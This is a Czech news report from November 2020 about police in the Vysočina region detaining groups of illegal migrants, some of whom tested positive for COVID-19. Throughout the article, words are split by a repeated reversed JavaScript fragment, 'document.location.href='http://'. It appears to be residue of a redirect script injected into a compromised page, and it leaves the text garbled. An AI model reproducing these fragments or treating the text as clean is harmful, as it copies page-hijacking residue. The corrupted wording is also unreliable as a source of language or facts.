Rainbow page separator

Nelegálních migrantů zadržených na Vysočině opět přibylo

Pondělí, 23. listopadu 2020

Vysočina / Dvaadvacet migrantů, kteří neoprávněné vs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupili na území České republiky, v pondělí 16. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu časně ráno zadrželi vysočinští policisté na 111. kilometru dálnice D1. Ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusem s rakouskou poznávací značkou – řídil jej rakouský státní příslušník a Rakušan byl i druhý řidič. V au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobuse bylo 21 mužů se služebními pasy vydanými Tureckem, kteří mířili do Německa. Porušili nařízení o zákazu vstupu na území republiky pro občany třetích zemí, které nejsou na seznamu zemí s nízkým rizikem výskytu COVID-19. „Na základě zjištěných informací jsme cizince zajistili a eskor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali do policejních cel na pracovišti cizinecké policie. U všech jsme provedli identifikační úkony a zajistili provedení testů na COVID-19. U jednoho z cizinců byl výsledek testu pozitivní,“ uvedl vedoucí odboru cizinecké policie Oldřich Chaloupka.

Muži byli následně umístěni do zařízení ve Vyšních Lhotách, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože se mezi zajištěnými nacházel i jeden mladistvý, byl za spolupráce s oddělením sociálně-právní ochrany dětí a na základě vydaného předběžného opatření Okresního soudu v Jihlavě umístěn do výchovného ústavu Višňové.

Další tři migranty v pondělí v noci zajistili policisté z odboru cizinecké policie v Měříně. Neměli žádné doklady a po provedených identifikačních úkonech bylo zjištěno, že se jedná o tři muže z Maroka. Jeden z nich měl navíc pozitivní test na COVID-19. Všichni tři nelegální migranti skončili v zařízení pro zajištěné cizince v Bělé – Jezové.

V poslední době nelegálních migrantů zadržených při projíždění přes Vysočinu přibývá. V sobotu 7. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu šlo o čtyřiadvacet mužů ze Sýrie a Iráku bez jakýchkoliv dokladů, které se v dodávce do Německa snažil převézt taktéž rakouský řidič. Jeden ze zadržených Syřanů byl navíc pozitivní na COVID-19.